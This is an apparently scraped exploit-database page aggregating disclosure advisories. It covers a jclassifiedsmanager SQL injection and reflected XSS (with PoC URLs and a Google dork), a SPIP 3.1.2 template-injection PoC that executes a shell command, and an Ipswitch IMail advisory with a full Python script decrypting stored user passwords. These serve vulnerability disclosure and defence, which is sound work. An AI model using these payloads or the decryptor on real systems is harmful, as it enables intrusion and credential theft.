Search...

jclassifiedsmanager - Multiple Vulnerabilities

2015-01-26T00:00:00

ID 1337DAY-ID-23192
Type zdt
Reporter Sarath Nair
Modified 2015-01-26T00:00:00

Description

Exploit for multiple platform in category web applications

                                        
                                            # Exploit Title: jclassifiedsmanager Multiple Vulnerabilities
# Google Dork: inurl:com_jclassifiedsmanager
# Date: 26 Jan 2015
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv
# Vendor Homepage: cmsjunkie.com
# Software Link: http://www.cmsjunkie.com/classifieds-manager
 
 
# PoC Exploit: SQL Injection
--------------------------------
http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]
"id" parameter is not sanitized.
 
# PoC Exploit: XSS Reflected
--------------------------------
http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1
"view" parameter is not sanitized.
 
########################################
# Vulnerability Disclosure Timeline:
  
2014-Dec-11:  Discovered vulnerability
2014-Dec-12:  Vendor Notification
2014-Dec-12:  Vendor Response/Feedback
2015-Jan-19:  Vendor Fix/Patch
2015-Jan-26:  Public Disclosure
#######################################

#  0day.today [2018-01-05]  #

JSON Vulners Source

Initial Source

{"published": "2015-01-26T00:00:00", "id": "1337DAY-ID-23192", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:01:43", "bulletin": {"published": "2015-01-26T00:00:00", "id": "1337DAY-ID-23192", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.6, "modified": "2016-04-20T02:01:43"}}, "hash": "5c40547b771e55d6d14ffac0a13626075143635570dda38ced091b44e2784c5b", "description": "Exploit for multiple platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T02:01:43", "edition": 1, "title": "jclassifiedsmanager - Multiple Vulnerabilities", "href": "http://0day.today/exploit/description/23192", "modified": "2015-01-26T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/23192", "references": [], "reporter": "Sarath Nair", "sourceData": "# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities\r\n# Google Dork: inurl:com_jclassifiedsmanager\r\n# Date: 26 Jan 2015\r\n# Exploit Author: Sarath Nair aka AceNeon13\r\n# Contact: @AceNeon13\r\n# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv\r\n# Vendor Homepage: cmsjunkie.com\r\n# Software Link: http://www.cmsjunkie.com/classifieds-manager\r\n \r\n \r\n# PoC Exploit: SQL Injection\r\n--------------------------------\r\nhttp://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]\r\n\"id\" parameter is not sanitized.\r\n \r\n# PoC Exploit: XSS Reflected\r\n--------------------------------\r\nhttp://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b\"onload%3d\"alert(1)\"87d4d&layout=offerring&controller=displayads&adtype=1\r\n\"view\" parameter is not sanitized.\r\n \r\n########################################\r\n# Vulnerability Disclosure Timeline:\r\n \r\n2014-Dec-11: Discovered vulnerability\r\n2014-Dec-12: Vendor Notification\r\n2014-Dec-12: Vendor Response/Feedback\r\n2015-Jan-19: Vendor Fix/Patch\r\n2015-Jan-26: Public Disclosure\r\n#######################################\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "8ea85a23b5f04bc2acbb7bb1aed2d009", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ac12bc542a76afc2d98da48da9038f6f", "key": "published"}, {"hash": "ac12bc542a76afc2d98da48da9038f6f", "key": "modified"}, {"hash": "575c275ed9813c5f001991a81df81d32", "key": "description"}, {"hash": "2614937bab5439dc278d0eeebe9d96d0", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c0ab73ca5a7720fd7e2bb05ab3278733", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "760f9d3b7e69e0afa77303188ed22216", "key": "title"}, {"hash": "706860cf2f97ec6c41e5298b0e4b1b39", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for multiple platform in category web applications", "hash": "16f7c82cb4000d26daabf205ff7fbebc8ee42af4411ff3706b7f3b18bbd96b15", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-01-05T07:03:22"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:40595"]}, {"type": "zdt", "idList": ["1337DAY-ID-25914"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139239"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23192", "SECURITYVULNS:VULN:10596"]}], "modified": "2018-01-05T07:03:22"}, "vulnersScore": -0.0}, "type": "zdt", "lastseen": "2018-01-05T07:03:22", "edition": 2, "title": "jclassifiedsmanager - Multiple Vulnerabilities", "href": "https://0day.today/exploit/description/23192", "modified": "2015-01-26T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/23192", "references": [], "reporter": "Sarath Nair", "sourceData": "# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities\r\n# Google Dork: inurl:com_jclassifiedsmanager\r\n# Date: 26 Jan 2015\r\n# Exploit Author: Sarath Nair aka AceNeon13\r\n# Contact: @AceNeon13\r\n# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv\r\n# Vendor Homepage: cmsjunkie.com\r\n# Software Link: http://www.cmsjunkie.com/classifieds-manager\r\n \r\n \r\n# PoC Exploit: SQL Injection\r\n--------------------------------\r\nhttp://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]\r\n\"id\" parameter is not sanitized.\r\n \r\n# PoC Exploit: XSS Reflected\r\n--------------------------------\r\nhttp://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b\"onload%3d\"alert(1)\"87d4d&layout=offerring&controller=displayads&adtype=1\r\n\"view\" parameter is not sanitized.\r\n \r\n########################################\r\n# Vulnerability Disclosure Timeline:\r\n \r\n2014-Dec-11: Discovered vulnerability\r\n2014-Dec-12: Vendor Notification\r\n2014-Dec-12: Vendor Response/Feedback\r\n2015-Jan-19: Vendor Fix/Patch\r\n2015-Jan-26: Public Disclosure\r\n#######################################\n\n# 0day.today [2018-01-05] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "575c275ed9813c5f001991a81df81d32", "key": "description"}, {"hash": "999c426f5213d493269c978afd947257", "key": "href"}, {"hash": "ac12bc542a76afc2d98da48da9038f6f", "key": "modified"}, {"hash": "ac12bc542a76afc2d98da48da9038f6f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "706860cf2f97ec6c41e5298b0e4b1b39", "key": "reporter"}, {"hash": "4e491101a574869ff8be22bb880818d6", "key": "sourceData"}, {"hash": "2b219ab0d6bb65f697fe3013dcc6d6a1", "key": "sourceHref"}, {"hash": "760f9d3b7e69e0afa77303188ed22216", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"cve": [{"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "The SPIP template composer/compiler in SPIP 3.1.2 and earlier allows remote authenticated users to execute arbitrary PHP code by uploading an HTML file with a crafted (1) INCLUDE or (2) INCLURE tag and then accessing it with a valider_xml action.", "modified": "2017-05-24T01:29:00", "id": "CVE-2016-7998", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7998", "published": "2017-01-18T17:59:00", "title": "CVE-2016-7998", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-10-20T20:18:39", "bulletinFamily": "exploit", "description": "SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution. CVE-2016-7998. Webapps exploit for PHP platform", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "EDB-ID:40595", "href": "https://www.exploit-db.com/exploits/40595/", "type": "exploitdb", "title": "SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution", "sourceData": "## SPIP 3.1.2 Template Compiler/Composer PHP Code Execution (CVE-2016-7998)\r\n\r\n### Product Description\r\n\r\nSPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence.\r\n\r\n### Vulnerability Description\r\n\r\nThe SPIP template composer/compiler does not correctly handle SPIP \"INCLUDE/INCLURE\" Tags, allowing PHP code execution by an authenticated user.\r\nThis vulnerability can be exploited using the CSRF or the XSS vulnerability also found in this advisory.\r\n\r\n**Access Vector**: remote\r\n\r\n**Security Risk**: critical\r\n\r\n**Vulnerability**: CWE-94\r\n\r\n**CVSS Base Score**: 9.1 (Critical)\r\n\r\n**CVE-ID**: CVE-2016-7998\r\n\r\n### Proof of Concept\r\n\r\nStore a `.html` file in a random directory with the following content :\r\n\r\n <INCLURE(xxx\"\\)\\);}system\$\"touch /tmp/exploited\"\$;/*)>\r\n\r\nThen you can access to the following URL, with the `var_url` paramater pointing to the path corresponding to your uploaded file:\r\n\r\n http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///tmp/directory&ext=html\r\n\r\nThe PHP code `system(\"touch /tmp/exploited\");` will be executed after 2 requests.\r\n\r\nThis happens because the template file is included (if already compiled) by `ecrire/public/composer.php`, line 60 :\r\n\r\n if (!squelette_obsolete($phpfile, $source)) {\r\n include_once $phpfile;\r\n\r\nand because we can \"exit\" the function generated by the template compiler (improper sanitization when generating argumenter_squelette):\r\n\r\n function html_xxxx($Cache, $Pile, $doublons = array(), $Numrows = array(), $SP = 0) {\r\n if (isset($Pile[0][\"doublons\"]) AND is_array($Pile[0][\"doublons\"]))\r\n $doublons = nettoyer_env_doublons($Pile[0][\"doublons\"]);\r\n $connect = '';\r\n $page = (\r\n '<'.'?php echo recuperer_fond( ' . argumenter_squelette(\"xxx\"));}system(\"touch /tmp/exploited\");/*\") . ', array(\\'lang\\' => ' . argumenter_squelette($GLOBALS[\"spip_lang\"]) . '), array(\"compil\"=>array(\\'/tmp/exploit.html\\',\\'html_xxxx\\',\\'\\',1,$GLOBALS[\\'spip_lang\\'])), _request(\"connect\"));\r\n ?'.'>\r\n ');\r\n return analyse_resultat_skel('html_xxxx', $Cache, $page, '/tmp/exploit.html');\r\n }\r\n\r\nTherefore, the vulnerability leads to arbitrary PHP code execution.\r\n\r\n\r\n### Vulnerable code\r\n\r\nThe vulnerable code is located in the `argumenter_inclure` function (`ecrire/public/compiler.php`), line 123.\r\n\r\n if ($var !== 1) {\r\n $val = ($echap ? \"\\'$var\\' => ' . argumenter_squelette(\" : \"'$var' => \")\r\n . $val . ($echap ? \") . '\" : \" \");\r\n }\r\n\r\n### Timeline (dd/mm/yyyy)\r\n\r\n* 15/09/2016 : Initial discovery\r\n* 26/09/2016 : Contact with SPIP Team\r\n* 27/09/2016 : Answer from SPIP Team, sent advisory details\r\n* 27/09/2016 : Fixes issued for PHP Code Execution\r\n* 30/09/2016 : SPIP 3.1.3 Released\r\n\r\n### Fixes\r\n\r\n* https://core.spip.net/projects/spip/repository/revisions/23186\r\n* https://core.spip.net/projects/spip/repository/revisions/23189\r\n* https://core.spip.net/projects/spip/repository/revisions/23192\r\n\r\n### Affected versions\r\n\r\n* Version <= 3.1.2\r\n\r\n### Credits\r\n\r\n* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)\r\n\r\n\r\n-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40595/"}], "zdt": [{"lastseen": "2018-03-28T05:19:38", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "href": "https://0day.today/exploit/description/25914", "id": "1337DAY-ID-25914", "type": "zdt", "title": "SPIP 3.1.2 Template Compiler / Composer PHP Code Execution", "sourceData": "## SPIP 3.1.2 Template Compiler/Composer PHP Code Execution (CVE-2016-7998)\r\n\r\n### Product Description\r\n\r\nSPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence.\r\n\r\n### Vulnerability Description\r\n\r\nThe SPIP template composer/compiler does not correctly handle SPIP \"INCLUDE/INCLURE\" Tags, allowing PHP code execution by an authenticated user.\r\nThis vulnerability can be exploited using the CSRF or the XSS vulnerability also found in this advisory.\r\n\r\n**Access Vector**: remote\r\n\r\n**Security Risk**: critical\r\n\r\n**Vulnerability**: CWE-94\r\n\r\n**CVSS Base Score**: 9.1 (Critical)\r\n\r\n**CVE-ID**: CVE-2016-7998\r\n\r\n### Proof of Concept\r\n\r\nStore a `.html` file in a random directory with the following content :\r\n\r\n <INCLURE(xxx\"\\)\\);}system\$\"touch /tmp/exploited\"\$;/*)>\r\n\r\nThen you can access to the following URL, with the `var_url` paramater pointing to the path corresponding to your uploaded file:\r\n\r\n http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///tmp/directory&ext=html\r\n\r\nThe PHP code `system(\"touch /tmp/exploited\");` will be executed after 2 requests.\r\n\r\nThis happens because the template file is included (if already compiled) by `ecrire/public/composer.php`, line 60 :\r\n\r\n if (!squelette_obsolete($phpfile, $source)) {\r\n include_once $phpfile;\r\n\r\nand because we can \"exit\" the function generated by the template compiler (improper sanitization when generating argumenter_squelette):\r\n\r\n function html_xxxx($Cache, $Pile, $doublons = array(), $Numrows = array(), $SP = 0) {\r\n if (isset($Pile[0][\"doublons\"]) AND is_array($Pile[0][\"doublons\"]))\r\n $doublons = nettoyer_env_doublons($Pile[0][\"doublons\"]);\r\n $connect = '';\r\n $page = (\r\n '<'.'?php echo recuperer_fond( ' . argumenter_squelette(\"xxx\"));}system(\"touch /tmp/exploited\");/*\") . ', array(\\'lang\\' => ' . argumenter_squelette($GLOBALS[\"spip_lang\"]) . '), array(\"compil\"=>array(\\'/tmp/exploit.html\\',\\'html_xxxx\\',\\'\\',1,$GLOBALS[\\'spip_lang\\'])), _request(\"connect\"));\r\n ?'.'>\r\n ');\r\n return analyse_resultat_skel('html_xxxx', $Cache, $page, '/tmp/exploit.html');\r\n }\r\n\r\nTherefore, the vulnerability leads to arbitrary PHP code execution.\r\n\r\n\r\n### Vulnerable code\r\n\r\nThe vulnerable code is located in the `argumenter_inclure` function (`ecrire/public/compiler.php`), line 123.\r\n\r\n if ($var !== 1) {\r\n $val = ($echap ? \"\\'$var\\' => ' . argumenter_squelette(\" : \"'$var' => \")\r\n . $val . ($echap ? \") . '\" : \" \");\r\n }\r\n\r\n### Timeline (dd/mm/yyyy)\r\n\r\n* 15/09/2016 : Initial discovery\r\n* 26/09/2016 : Contact with SPIP Team\r\n* 27/09/2016 : Answer from SPIP Team, sent advisory details\r\n* 27/09/2016 : Fixes issued for PHP Code Execution\r\n* 30/09/2016 : SPIP 3.1.3 Released\r\n\r\n### Fixes\r\n\r\n* https://core.spip.net/projects/spip/repository/revisions/23186\r\n* https://core.spip.net/projects/spip/repository/revisions/23189\r\n* https://core.spip.net/projects/spip/repository/revisions/23192\r\n\r\n### Affected versions\r\n\r\n* Version <= 3.1.2\r\n\r\n### Credits\r\n\r\n* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)\n\n# 0day.today [2018-03-28] #", "sourceHref": "https://0day.today/exploit/25914", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:46", "bulletinFamily": "exploit", "description": "", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "href": "https://packetstormsecurity.com/files/139239/SPIP-3.1.2-Template-Compiler-Composer-PHP-Code-Execution.html", "id": "PACKETSTORM:139239", "type": "packetstorm", "title": "SPIP 3.1.2 Template Compiler / Composer PHP Code Execution", "sourceData": "`## SPIP 3.1.2 Template Compiler/Composer PHP Code Execution (CVE-2016-7998) \n \n### Product Description \n \nSPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence. \n \n### Vulnerability Description \n \nThe SPIP template composer/compiler does not correctly handle SPIP \"INCLUDE/INCLURE\" Tags, allowing PHP code execution by an authenticated user. \nThis vulnerability can be exploited using the CSRF or the XSS vulnerability also found in this advisory. \n \n**Access Vector**: remote \n \n**Security Risk**: critical \n \n**Vulnerability**: CWE-94 \n \n**CVSS Base Score**: 9.1 (Critical) \n \n**CVE-ID**: CVE-2016-7998 \n \n### Proof of Concept \n \nStore a `.html` file in a random directory with the following content : \n \n<INCLURE(xxx\"\\)\\);}system\$\"touch /tmp/exploited\"\$;/*)> \n \nThen you can access to the following URL, with the `var_url` paramater pointing to the path corresponding to your uploaded file: \n \nhttp://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///tmp/directory&ext=html \n \nThe PHP code `system(\"touch /tmp/exploited\");` will be executed after 2 requests. \n \nThis happens because the template file is included (if already compiled) by `ecrire/public/composer.php`, line 60 : \n \nif (!squelette_obsolete($phpfile, $source)) { \ninclude_once $phpfile; \n \nand because we can \"exit\" the function generated by the template compiler (improper sanitization when generating argumenter_squelette): \n \nfunction html_xxxx($Cache, $Pile, $doublons = array(), $Numrows = array(), $SP = 0) { \nif (isset($Pile[0][\"doublons\"]) AND is_array($Pile[0][\"doublons\"])) \n$doublons = nettoyer_env_doublons($Pile[0][\"doublons\"]); \n$connect = ''; \n$page = ( \n'<'.'?php echo recuperer_fond( ' . argumenter_squelette(\"xxx\"));}system(\"touch /tmp/exploited\");/*\") . ', array(\\'lang\\' => ' . argumenter_squelette($GLOBALS[\"spip_lang\"]) . '), array(\"compil\"=>array(\\'/tmp/exploit.html\\',\\'html_xxxx\\',\\'\\',1,$GLOBALS[\\'spip_lang\\'])), _request(\"connect\")); \n?'.'> \n'); \nreturn analyse_resultat_skel('html_xxxx', $Cache, $page, '/tmp/exploit.html'); \n} \n \nTherefore, the vulnerability leads to arbitrary PHP code execution. \n \n \n### Vulnerable code \n \nThe vulnerable code is located in the `argumenter_inclure` function (`ecrire/public/compiler.php`), line 123. \n \nif ($var !== 1) { \n$val = ($echap ? \"\\'$var\\' => ' . argumenter_squelette(\" : \"'$var' => \") \n. $val . ($echap ? \") . '\" : \" \"); \n} \n \n### Timeline (dd/mm/yyyy) \n \n* 15/09/2016 : Initial discovery \n* 26/09/2016 : Contact with SPIP Team \n* 27/09/2016 : Answer from SPIP Team, sent advisory details \n* 27/09/2016 : Fixes issued for PHP Code Execution \n* 30/09/2016 : SPIP 3.1.3 Released \n \n### Fixes \n \n* https://core.spip.net/projects/spip/repository/revisions/23186 \n* https://core.spip.net/projects/spip/repository/revisions/23189 \n* https://core.spip.net/projects/spip/repository/revisions/23192 \n \n### Affected versions \n \n* Version <= 3.1.2 \n \n### Credits \n \n* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) \n \n \n-- \nSYSDREAM Labs <labs@sysdream.com> \n \nGPG : \n47D1 E124 C43E F992 2A2E \n1551 8EB4 8CD9 D5B2 59A1 \n \n* Website: https://sysdream.com/ \n* Twitter: @sysdream \n \n \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139239/spip312-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "description": "|------------------------------------------------------------------|\r\n| __ __ |\r\n| _________ ________ / /___ _____ / /____ ____ _____ ___ |\r\n| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |\r\n| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\r\n| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |\r\n| |\r\n| http://www.corelan.be:8800 |\r\n| |\r\n|-------------------------------------------------[ EIP Hunters ]--|\r\n\r\nAdvisory : CORELAN-10-009\r\nDisclosure Date : Feb 4th, 2010\r\n\r\n0x00 : Vulnerability Information\r\n\r\n [+] Product : IMail Server\r\n [+] Version : 11.01\r\n [+] Vendor : Ipswitch\r\n [+] URL : http://www.ipswitch.com/\r\n [+] Platform : Windows\r\n [+] Issue fix: No\r\n [+] Vulnerability discovered by: sinn3r\r\n [+] Greetings to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me/ekse/sinn3r/Jacky/jnz;\r\n and all the guys with secret identities at exploit-db.com :-p\r\n [+] Special thanks to: Jason from Ipswitch\r\n\r\n0x01 : Vendor Description of Software\r\n\r\n "The Award-winning IMail Server is a proven email messaging solution for small and mid-sized businesses.\r\n Reliable, scalable and versatile, IMail Server is an affordable choice that meets the messaging needs\r\n of small and medium sized businesses. Unlike complicated and more expensive messaging solutions, IMail\r\n Server delivers a quick and easy installation. As a scalable, standards-based, email server with Webmail,\r\n optional integration with Microsoft Exchange ActiveSync(r), SMTP, POP, IMAP, LDAP, and List Server, IMail\r\n users can send and receive email using any standards-based client, including Microsoft Outlook(r),\r\n Outlook Express(r), or Eudora(r). Or, users can access email from anywhere via IMail's customizable Web\r\n messaging, available in eight languages.\r\n\r\n Designed to place minimal ongoing maintenance burden on network administrators, IMail can authenticate\r\n users from its own database, an active directory database, or from any ODBC-compliant data store, making\r\n life easier for the busy administrator. IMail Server also delivers a quick and easy installation or upgrade\r\n process."\r\n\r\n0x02 : Vulnerability Details\r\n\r\n 1. By default, IMail allows Internet Guest Account to have "Full Control" to the following registry key,\r\n including its subkeys and values. As well as the default IMail directory:\r\n HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\r\n C:\Program Files\Ipswitch\IMail\\r\n\r\n 2. The IMail password decryption algorithm implemented in IMailsec.dll is also reversible.\r\n\r\n0x03 : Vendor Communication\r\n\r\n 1/21/2010 - IMail vendor contacted\r\n 1/26/2010 - Got a reply from the vendor (product development manager) for more vulnerability clarification.\r\n No fix yet.\r\n 2/02/2010 - Received another reply from the vendor: Issues logged for additional research. No plans for\r\n immediate changes. A public advisory was also suggested by the vendor as reference in their\r\n tech/KB article.\r\n 2/04/2010 - Public disclosure: Advisory created. Vendor informed.\r\n\r\n0x04 : Exploit/Proof-of-Concept\r\n\r\n#!/usr/bin/python\r\n\r\n##########################################################################\r\n# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor\r\n# Tested on: Windows XP SP3 (Windows version does not matter)\r\n# Description:\r\n# So I reverse engineered the IMail password decryption function in\r\n# IMailsec.dll, located at 0x00563130.\r\n#\r\n# In order to decrypt correctly, you must have the correct username,\r\n# because it is used as a key.\r\n#\r\n# All usernames and passwords are stored in registry, which can be\r\n# found at:\r\n# HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\[domain name]\Users\r\n# Every registry key under "Users" has a string value named "Password",\r\n# in there you'll find the encrypted password.\r\n#\r\n# By default, Internet Guest Account is granted with "Full Control" to\r\n# the IMail registry, and its directory. That means if an attacker\r\n# manages to gain code execution (ie.via a web app bug), IMail can be\r\n# his/her next playground. And IMail users may not be safe.\r\n#\r\n# Demo:\r\n# sinn3r@bt4:~$ ./iMailDecrypt.py admin C8D3D19AA094\r\n# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor\r\n# coded by sinn3r - x90.sinner{at}gmail.c0m\r\n# [*] Password = god123\r\n#\r\n# Responsible Disclosure Timeline:\r\n# 1/21/2010 - IMail vendor contacted\r\n# 1/26/2010 - Got a reply from the vendor for more vulnerability\r\n# clarfication. No fix yet.\r\n# 2/02/2010 - Received another reply from the vendor: Issues logged for\r\n# additional research. No plans for immediate changes.\r\n# A public advisory was also suggested by the vendor as\r\n# reference in their tech/KB article.\r\n# 2/04/2010 - Public Disclosure. Vendor informed again.\r\n##########################################################################\r\n\r\nimport sys\r\nimport binascii\r\n\r\n## Convert the encrypted string to integers for calculation\r\n## Returns the integer version as a list\r\ndef convertToInt(data):\r\n charset = []\r\n for char in (data):\r\n tmp = char.encode("hex")\r\n tmp = int(tmp, 16)\r\n charset.append(tmp)\r\n return charset\r\n \r\n\r\n## Decrypt the password\r\n## Returns the decrypted version as a list\r\ndef decryptPassword(intUsername, intPassword):\r\n results = []\r\n counter = 0\r\n counter2 = 0\r\n pwdLength = len(intPassword)\r\n while counter<pwdLength:\r\n firstByte = intPassword[counter]\r\n if firstByte <= 57: #0x39\r\n firstByte -= 48 #0x30\r\n else:\r\n firstByte -= 55 #0x37\r\n firstByte *= 16 #SHL 0x40\r\n secondByte = intPassword[counter+1]\r\n if secondByte <= 57: #0x39\r\n secondByte -= 48 #0x30\r\n else:\r\n secondByte -= 55 #0x37\r\n tmp = firstByte + secondByte\r\n\r\n if len(intUsername) <= counter2:\r\n counter2 = 0\r\n\r\n if intUsername[counter2] > 54: #0x41\r\n if intUsername[counter2] < 90: #5A\r\n intUsername[counter2] += 32 #0x20\r\n\r\n tmp -= intUsername[counter2]\r\n counter2 += 1\r\n\r\n results.append(hex(tmp)[2:])\r\n counter += 2\r\n return results\r\n\r\nbanner = """Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor\r\ncoded by sinn3r - x90.sinner{at}gmail{d0t}c0m"""\r\n\r\nprint banner\r\n\r\nif len(sys.argv) == 3:\r\n if len(sys.argv[2]) % 2 == 0:\r\n username = convertToInt(sys.argv[1])\r\n password = convertToInt(sys.argv[2])\r\n decryptor = str("".join(decryptPassword(username, password)))\r\n print "[*] Password = %s" %binascii.unhexlify(decryptor)\r\n else:\r\n print "[*] Incorrect Encrypted password length"\r\nelse:\r\n print "[*] Usage: %s <username> <encrypted password>" %sys.argv[0]\r\n", "modified": "2010-02-08T00:00:00", "published": "2010-02-08T00:00:00", "id": "SECURITYVULNS:DOC:23192", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23192", "title": "CORELAN-10-009 : Ipswitch IMAIL 11.01 multiple vulnerabilities (reversible encryption + weak ACL)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "Weak permissions for registry and installation folder. Passwords are stored in readable location with reversible encryption.", "modified": "2010-02-08T00:00:00", "published": "2010-02-08T00:00:00", "id": "SECURITYVULNS:VULN:10596", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10596", "title": "Ipswitch IMail multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}